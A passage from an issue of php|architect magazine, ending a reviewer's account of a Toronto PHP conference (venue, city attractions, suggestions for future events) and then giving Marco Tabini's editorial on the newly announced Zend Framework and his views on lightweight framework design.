that were released over the last 10 years. Since this is the 10th anniversary of PHP, it was thought a fitting gesture to give this to the language’s inventor. I want to thank Derick Rethans (who was incidentally also one of the speakers) for graciously supplying a few of these pictures, as my camera was still in its holder a few times when it shouldn’t have been.
Peripherals Many reviews of conferences don’t talk about the other peripheral things that are usually part of a conference stay and location. So, let’s discuss that. The location of the hotel was great—just across the street and a short walk from the subway, which takes about 15 minutes to get you downtown. Toronto is one of the biggest cities in North America, so there is a lot to do. During the week of the conference for example, there were Major League baseball games (I got to attend one of them), there was an international film festival on, and U2 was in concert (I managed to get to this, too—me and 59,999 other people. U2 is an awesome live band), and of course there is the CN Tower, The Ontario Science Center,
George Schlossnagle during his Regex Clinic
the National Hockey League Hall of Fame, the Eaton’s Shopping complex, and restaurants galore. I felt quite safe in this city too; as a small town person, I had no worries. The hotel itself (Holiday Inn Yorkdale) was very nice and the staff quite helpful when we were setting up the conference rooms and the registration desk, for example. The huge mall across the street topped it off for souvenir shopping. I couldn’t have asked for a better large city venue.
Summary This was the first PHP conference that I have attended, so it is a little hard to compare it to others on the go. I do however, have extensive conference experience having attended and spoken at conferences in New Orleans, USA; Klon, Germany; and Melbourne, Australia. This certainly was up there with the others that I have attended. Now for the criticisms (AKA the wish list): There are not too many complaints, really, and some of these points were gathered from other attendees who I was able to talk with over a lunch meal. I would have liked to see better abstracts of the
The audience during one of Rasmus’ keynote addresses
Volume 4 Issue 11 • php|architect • 61
Product Review The speakers’ dinner
sessions, on the supporting web site so that attendees could better judge which sessions to attend (some abstracts were non-existent). It would also be nice to have had the sessions video taped and be able to buy a conference DVD so that people could review the session information later at their own pace. Finally, it would be nice to have had some of the more popular sessions run more than once, so that if there were 2 or more popular sessions running at the same time, a person could attend the “live show” at another time. Having said all the above, I certainly would recommend this conference to any PHP’er who is serious about their development work. Having a meeting of the minds like the speakers who were present is very rare indeed. Add to this the opportunity for attendees to take the Zend
Our fearless editor-in-chief, Sean Coates
Certification Exam for free, and you have an excellent conference offering. Knowing the amount of work that is involved in a conference of this level makes me appreciate the work all that much more, as I was on the steering committee for the conferences in New Orleans that I mentioned earlier. My hat goes off to Marco and Arbi and the other un-sung heroes of this conference. Hopefully I will see all of my new friends again, next year!
PETER MACINTYRE lives and works in Prince Edward Island, Canada. He has been and editor with php|architect since September 2003. Peter is a Zend Certified Engineer. Peter’s web site is at http://www.paladin-bs.com.
Volume 4 Issue 11 • php|architect • 63
///exit(0); ////// It’s a Bird! It’s a Plane! It’s FUD! by M ARCO TABINI
O
ne of the best things about being in the know for once is watching others squirm in their seats while they try to come with an analysis for something about which they have absolutely no clue whatsoever. The signs that Zend was working on a new framework had been floating around for a while—even though I was only asked to participate shortly before the public announcement, I had heard about the new project through the developer grapevine several weeks earlier (of course, that’s easy to say now that the cat is out the bag—but that’s the beauty of gloating: it’s self-serving, very rewarding and virtually guilt-free). I happened to read a few blog posts after the initial announcement (which, ironically, wasn’t confirmed by Zend until a few days later) and wasn’t surprised that the first people to react to it were those who had already been working on other frameworks. What surprised me, however, was how some of them, with absolutely no facts in hand, lashed out at Zend for, in their eyes, trying to destroy their creations with complete disregard for the community. I don’t want to come across as a Zend apologist here—even though I realize that they wanted to seize on the unique opportunity that their conference presented them to make a big splash with their announcement, I don’t think that it was wise to present the framework to the world without much more than some ideas and a smiling face. My first reaction to the framework was a shrug—just like my first reaction to most of the other frameworks out there. The problem with frameworks is that they become too bloated almost from the very moment they start to exist. In the framework that we use internally for our projects, we have a firm rule: there cannot be more than three levels of inheritance. If we exceed that level, we failed and we need to scrap whatever it was that we were working on and start over. This somewhat draconian rule keeps our framework shallow, which is the way I like it. Shallowness translates into a framework that is lightweight and does not introduce an unreasonable level of bloat. In other words, the additional overhead introduced by the presence of
the framework is balanced out by the advantages that we derive from its use in a way that we can live with. Of course, this means that the framework itself provides us with “limited” functionality—in fact, we aim at writing general-purpose classes that take care of about 70-75% of the work, leaving the remainder up to the developer to come up. This is fine by me, as my experience has taught me that anything more than that causes the overhead to escalate geometrically in relation to the benefits (anything that starts with a base class called CObject belongs in university textbooks, not in the real world). Two more aspects of a framework are particularly relevant to me: the presence of a testing harness and the consistency of the interfaces. The former is a clear must to ensure that the framework both behaves as advertised and can be upgraded in a clean way. The latter ensures that the contract between the framework and the end developer is not altered at some juncture without one of the two end points getting out of sync. Will the Zend framework deliver? It’s just too early to say. For sure, there are some smart people behind it (and, for once, I’m not talking about myself), and they’re all speaking the right language—simplicity, shallowness and proper development strategies. While things can always go awry, it’s good to see that they are progressing so rapidly and working hard at trying to build a nucleus upon which a larger group of people can improve. Others have brought up the spectre of intellectual property rights, and how the Zend Framework will help solve them. While this may matter to some of the larger implementers of PHP solutions (in other words, those who may sue each other for allegedly using their respective code), to the majority of the PHP community it will be, at most, a fringe benefit. Sure, it’s great to hear that SCO won’t take you to court any day soon, but if you’re a small fish they weren’t going to anyway. The real benefit for the bottom of the pyramid is going to be in the fact that a commercially-backed open-source framework, while free, will inevitably attract customers who are ready to back their implementation with commercial support, thus allowing our community to grow, for once, in dollar signs as well as in Netcraft statistics.